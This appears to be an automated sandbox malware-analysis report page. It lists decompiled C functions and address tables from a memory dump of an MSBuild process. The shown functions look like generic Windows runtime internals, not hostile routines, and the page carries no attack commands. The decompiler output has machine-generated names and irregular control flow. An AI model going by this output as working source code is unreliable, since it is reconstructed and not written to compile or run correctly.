                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7f3
                                                                                                0x010de7f6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7ed
                                                                                                0x010de7f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7e7
                                                                                                0x010de7ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111b685
                                                                                                0x0111b688
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111b682
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7cc
                                                                                                0x010de7d9
                                                                                                0x010de7dc
                                                                                                0x010de7de
                                                                                                0x010de7de
                                                                                                0x010de7ac
                                                                                                0x010de7e4
                                                                                                0x010de74b
                                                                                                0x010de751
                                                                                                0x010de759
                                                                                                0x010de761
                                                                                                0x010de761

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe60b73635cdb75565e682d331e67160683e6809ef75255c639a5d925e70b865
                                                                                                • Instruction ID: 0cb20c3ef09c6f0e4194bc07ef5fe00117b2fe5319644fed707311181555b2e9
                                                                                                • Opcode Fuzzy Hash: fe60b73635cdb75565e682d331e67160683e6809ef75255c639a5d925e70b865
                                                                                                • Instruction Fuzzy Hash: F4315C75A14249EFD744CF58D841B9ABBE4FB09214F1582AAFA58CB341D631E980CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DBC2C Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E010DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1196100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E010C2280(0xd, 0x57ef1a0);
				_t41 =  *0x11960f8; // 0x0
				if(_t41 != 0) {
					 *0x11960f8 =  *_t41;
					 *0x11960fc =  *0x11960fc + 0xffff;
				}
				E010BFFB0(_t41, 0x800, 0x57ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x11960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L010C4620(0x1196100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1196100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                0x010dbc36
                                                                                                0x010dbc42
                                                                                                0x010dbc45
                                                                                                0x010dbc4a
                                                                                                0x010dbd35
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010dbc50
                                                                                                0x010dbc50
                                                                                                0x010dbc58
                                                                                                0x010dbc5a
                                                                                                0x010dbc60
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111a4f2
                                                                                                0x0111a4f6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111a4fc
                                                                                                0x010dbc79
                                                                                                0x010dbc7e
                                                                                                0x010dbc86
                                                                                                0x010dbd16
                                                                                                0x010dbd20
                                                                                                0x010dbd20
                                                                                                0x010dbc8d
                                                                                                0x010dbc94
                                                                                                0x010dbcbd
                                                                                                0x010dbcca
                                                                                                0x010dbccb
                                                                                                0x010dbccc
                                                                                                0x010dbccd
                                                                                                0x010dbcce
                                                                                                0x010dbcd4
                                                                                                0x010dbcea
                                                                                                0x010dbcee
                                                                                                0x010dbcf2
                                                                                                0x010dbd00
                                                                                                0x010dbd04
                                                                                                0x00000000
                                                                                                0x010dbc96
                                                                                                0x010dbcab
                                                                                                0x010dbcaf
                                                                                                0x010dbd2c
                                                                                                0x010dbd2c
                                                                                                0x010dbd09
                                                                                                0x00000000
                                                                                                0x010dbd09
                                                                                                0x010dbcb1
                                                                                                0x010dbcb5
                                                                                                0x010dbcbb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010dbcbb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14c0b9fab41a93d049660ca1e488f86230b11e4218f63be80b5ce661d3cc8ad8
                                                                                                • Instruction ID: e043be223487cc28c37d7d132e83b1b1175a75ceaa10493db9777418a9074be1
                                                                                                • Opcode Fuzzy Hash: 14c0b9fab41a93d049660ca1e488f86230b11e4218f63be80b5ce661d3cc8ad8
                                                                                                • Instruction Fuzzy Hash: 83312272A007069BCB21EF58C4C07AA77B4FF19310F0A4079EDA4DB20AEB74D945CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A9100 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E010A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x117f6e8);
				E010FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E011788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E010FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x11986c0; // 0xc507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x11986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E010C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E011788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E010EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x119b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x11984c0;
										if(_t69 >=  *0x11984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01179063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E010A922A(_t82);
							_t53 = E010C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01178B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x11986c0; // 0xc507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x11986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x11986bc;
										_t72 = 0x11986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E010A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x11986c4;
									_t72 = 0x11986c0;
									L18:
									E010D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                0x010a9100
                                                                                                0x010a9100
                                                                                                0x010a9100
                                                                                                0x010a9100
                                                                                                0x010a9102
                                                                                                0x010a9107
                                                                                                0x010a910c
                                                                                                0x010a9110
                                                                                                0x010a9115
                                                                                                0x010a9136
                                                                                                0x010a9143
                                                                                                0x011037e4
                                                                                                0x011037e4
                                                                                                0x010a9149
                                                                                                0x010a914e
                                                                                                0x010a914e
                                                                                                0x010a9117
                                                                                                0x010a911d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a911f
                                                                                                0x010a9125
                                                                                                0x00000000
                                                                                                0x010a9151
                                                                                                0x010a9158
                                                                                                0x010a915d
                                                                                                0x010a9161
                                                                                                0x010a9168
                                                                                                0x01103715
                                                                                                0x00000000
                                                                                                0x010a916e
                                                                                                0x010a916e
                                                                                                0x010a9175
                                                                                                0x010a9177
                                                                                                0x010a917e
                                                                                                0x010a917f
                                                                                                0x010a9182
                                                                                                0x010a9182
                                                                                                0x010a9187
                                                                                                0x010a9187
                                                                                                0x010a918a
                                                                                                0x010a918d
                                                                                                0x010a918f
                                                                                                0x010a9192
                                                                                                0x010a9195
                                                                                                0x010a9198
                                                                                                0x010a9198
                                                                                                0x010a9198
                                                                                                0x010a919a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110371f
                                                                                                0x01103721
                                                                                                0x01103727
                                                                                                0x0110372f
                                                                                                0x01103733
                                                                                                0x01103735
                                                                                                0x01103738
                                                                                                0x0110373b
                                                                                                0x0110373d
                                                                                                0x01103740
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103746
                                                                                                0x01103749
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110374f
                                                                                                0x01103751
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103757
                                                                                                0x01103759
                                                                                                0x0110375c
                                                                                                0x0110375c
                                                                                                0x0110375e
                                                                                                0x0110375e
                                                                                                0x01103761
                                                                                                0x01103764
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103766
                                                                                                0x01103768
                                                                                                0x011037a3
                                                                                                0x011037a3
                                                                                                0x011037a5
                                                                                                0x011037a7
                                                                                                0x011037ad
                                                                                                0x011037b0
                                                                                                0x011037b2
                                                                                                0x011037bc
                                                                                                0x011037c2
                                                                                                0x011037c2
                                                                                                0x011037b2
                                                                                                0x010a9187
                                                                                                0x010a9187
                                                                                                0x010a918a
                                                                                                0x010a918d
                                                                                                0x010a918f
                                                                                                0x010a9192
                                                                                                0x010a9195
                                                                                                0x00000000
                                                                                                0x010a9195
                                                                                                0x00000000
                                                                                                0x010a9187
                                                                                                0x0110376a
                                                                                                0x0110376a
                                                                                                0x0110376c
                                                                                                0x0110376c
                                                                                                0x0110376f
                                                                                                0x01103775
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103777
                                                                                                0x01103779
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103782
                                                                                                0x01103787
                                                                                                0x01103789
                                                                                                0x01103790
                                                                                                0x01103790
                                                                                                0x0110378b
                                                                                                0x0110378b
                                                                                                0x0110378b
                                                                                                0x01103792
                                                                                                0x01103795
                                                                                                0x01103795
                                                                                                0x01103798
                                                                                                0x01103798
                                                                                                0x0110379b
                                                                                                0x0110379b
                                                                                                0x010a91a3
                                                                                                0x010a91a9
                                                                                                0x010a91b0
                                                                                                0x010a91b4
                                                                                                0x010a91b4
                                                                                                0x010a91bb
                                                                                                0x010a91c0
                                                                                                0x010a91c5
                                                                                                0x010a91c7
                                                                                                0x011037da
                                                                                                0x010a91cd
                                                                                                0x010a91cd
                                                                                                0x010a91cd
                                                                                                0x010a91d2
                                                                                                0x010a91d5
                                                                                                0x010a9239
                                                                                                0x010a9239
                                                                                                0x010a91d7
                                                                                                0x010a91db
                                                                                                0x010a91e1
                                                                                                0x010a91e7
                                                                                                0x010a91fd
                                                                                                0x010a9203
                                                                                                0x010a921e
                                                                                                0x010a9223
                                                                                                0x00000000
                                                                                                0x010a9223
                                                                                                0x010a9205
                                                                                                0x010a9208
                                                                                                0x010a920c
                                                                                                0x010a9214
                                                                                                0x010a9214
                                                                                                0x010a91e9
                                                                                                0x010a91e9
                                                                                                0x010a91ee
                                                                                                0x010a91f3
                                                                                                0x010a91f3
                                                                                                0x010a91f3
                                                                                                0x010a91e7
                                                                                                0x00000000
                                                                                                0x010a91db
                                                                                                0x010a9187
                                                                                                0x010a9168

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e41255a78d1a3fcdeb9f69062a55f463415b51f5ff68631e89c43c54c40cf57d
                                                                                                • Instruction ID: 005246a8217e0249a920fdfb6d1d1da8ebb751805baf384a7579b05bc689f6dd
                                                                                                • Opcode Fuzzy Hash: e41255a78d1a3fcdeb9f69062a55f463415b51f5ff68631e89c43c54c40cf57d
                                                                                                • Instruction Fuzzy Hash: B631D471B01645DFDB6ADFACC088BADBBF1BB49318F94819DC5946B241C374B980CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D1DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E010D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E010CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L010C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E010CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                0x010d1dc2
                                                                                                0x010d1dc5
                                                                                                0x010d1dc7
                                                                                                0x010d1dcc
                                                                                                0x010d1dce
                                                                                                0x010d1dd6
                                                                                                0x010d1ddf
                                                                                                0x010d1de0
                                                                                                0x010d1de1
                                                                                                0x010d1de5
                                                                                                0x010d1de8
                                                                                                0x010d1def
                                                                                                0x010d1df0
                                                                                                0x010d1df6
                                                                                                0x010d1df7
                                                                                                0x010d1dfe
                                                                                                0x010d1e1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d1e0b
                                                                                                0x010d1e12
                                                                                                0x010d1e12
                                                                                                0x010d1e00
                                                                                                0x010d1e00
                                                                                                0x010d1e05
                                                                                                0x010d1e1e
                                                                                                0x010d1e23
                                                                                                0x0111570f
                                                                                                0x01115713
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115719
                                                                                                0x01115719
                                                                                                0x010d1e2c
                                                                                                0x010d1e2d
                                                                                                0x010d1e2e
                                                                                                0x010d1e2f
                                                                                                0x010d1e31
                                                                                                0x010d1e32
                                                                                                0x010d1e35
                                                                                                0x010d1e3d
                                                                                                0x01115723
                                                                                                0x0111573d
                                                                                                0x0111573d
                                                                                                0x00000000
                                                                                                0x01115723
                                                                                                0x010d1e49
                                                                                                0x010d1e4e
                                                                                                0x010d1e4e
                                                                                                0x010d1e09
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                • Instruction ID: e64e88fc0829e52d23a91a36ca4c69988dfbd60a7f198ae9d43a5a4ab99463b6
                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                • Instruction Fuzzy Hash: 01214F72600219FFD725CF99CC80EAEBBBDEF89750F154095EA4597210DA74AE41CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01126C0A Relevance: .1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E01126C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E010C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1197b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L010C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E010EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E010C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E010E9AE0();
						_t23 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                0x01126c0a
                                                                                                0x01126c0f
                                                                                                0x01126c10
                                                                                                0x01126c13
                                                                                                0x01126c15
                                                                                                0x01126c19
                                                                                                0x01126c1c
                                                                                                0x01126c21
                                                                                                0x01126c28
                                                                                                0x01126c3a
                                                                                                0x01126c2a
                                                                                                0x01126c33
                                                                                                0x01126c33
                                                                                                0x01126c3f
                                                                                                0x01126c48
                                                                                                0x01126c4d
                                                                                                0x01126c60
                                                                                                0x01126c65
                                                                                                0x01126c69
                                                                                                0x01126c73
                                                                                                0x01126c79
                                                                                                0x01126c7f
                                                                                                0x01126c86
                                                                                                0x01126c90
                                                                                                0x01126c94
                                                                                                0x01126ca6
                                                                                                0x01126cb2
                                                                                                0x01126cbd
                                                                                                0x01126cbd
                                                                                                0x01126cc3
                                                                                                0x01126cc7
                                                                                                0x01126ccb
                                                                                                0x01126cd0
                                                                                                0x01126cd1
                                                                                                0x01126ce2
                                                                                                0x01126ce2
                                                                                                0x01126c69
                                                                                                0x01126ced

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fbbc6e51b8a82c976641877aff435feb4bfd54950ca7a4ec2833bd93c6dd56d2
                                                                                                • Instruction ID: b72022f22e59e3903539cb773420d813f92d7b7ecc721121f27e215e8a8762b5
                                                                                                • Opcode Fuzzy Hash: fbbc6e51b8a82c976641877aff435feb4bfd54950ca7a4ec2833bd93c6dd56d2
                                                                                                • Instruction Fuzzy Hash: C421ABB1A00655AFD715EB68D880E6AB7B8FF48700F040069F945C7790D734ED60CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E90AF Relevance: .1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E010E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E010FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E010DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L010C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E010EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E010DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                0x010e90af
                                                                                                0x010e90b8
                                                                                                0x010e90bb
                                                                                                0x010e90bf
                                                                                                0x010e90c2
                                                                                                0x010e90c2
                                                                                                0x010e90c8
                                                                                                0x010e90cb
                                                                                                0x010e90cd
                                                                                                0x011214d7
                                                                                                0x011214eb
                                                                                                0x011214eb
                                                                                                0x00000000
                                                                                                0x011214eb
                                                                                                0x011214db
                                                                                                0x011214e6
                                                                                                0x00000000
                                                                                                0x011214f2
                                                                                                0x011214e8
                                                                                                0x00000000
                                                                                                0x011214e8
                                                                                                0x010e90d8
                                                                                                0x010e90da
                                                                                                0x010e90dd
                                                                                                0x010e90e5
                                                                                                0x00000000
                                                                                                0x010e9139
                                                                                                0x010e90fa
                                                                                                0x010e90fe
                                                                                                0x010e9142
                                                                                                0x00000000
                                                                                                0x010e9142
                                                                                                0x010e9104
                                                                                                0x010e9107
                                                                                                0x010e910b
